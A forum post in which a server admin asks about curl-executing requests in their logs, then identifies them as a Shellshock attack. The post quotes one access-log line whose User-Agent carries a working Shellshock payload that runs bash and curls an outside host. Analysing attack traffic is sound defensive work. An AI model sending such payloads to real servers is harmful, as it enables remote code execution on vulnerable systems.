I see an increase in these types of attacks, requests with a bash execution of curl, which executes a remote piece of code.
My question is, which application is vulnerable to this attack? something like a log reader, like "awstats"? There aren't many applications that read/parse/display server logs for browser signatures.
Thank you!
- - - Updated - - -
Ah wait, that was just a simple shellshock attack... scratch that
what kind of stupid admin executes bash from cgi-bin?... no wonder this bug did not affect my servers...
My question is, which application is vulnerable to this attack? something like a log reader, like "awstats"? There aren't many applications that read/parse/display server logs for browser signatures.
Thank you!
Code:
176.102.38.77 - - [20/Dec/2014:20:30:43 +0000] "HEAD /cgi-bin/ HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c 'curl http://176.102.38.77/search/e.php?h=domain.com/cgi-bin/'"
Ah wait, that was just a simple shellshock attack... scratch that
what kind of stupid admin executes bash from cgi-bin?... no wonder this bug did not affect my servers...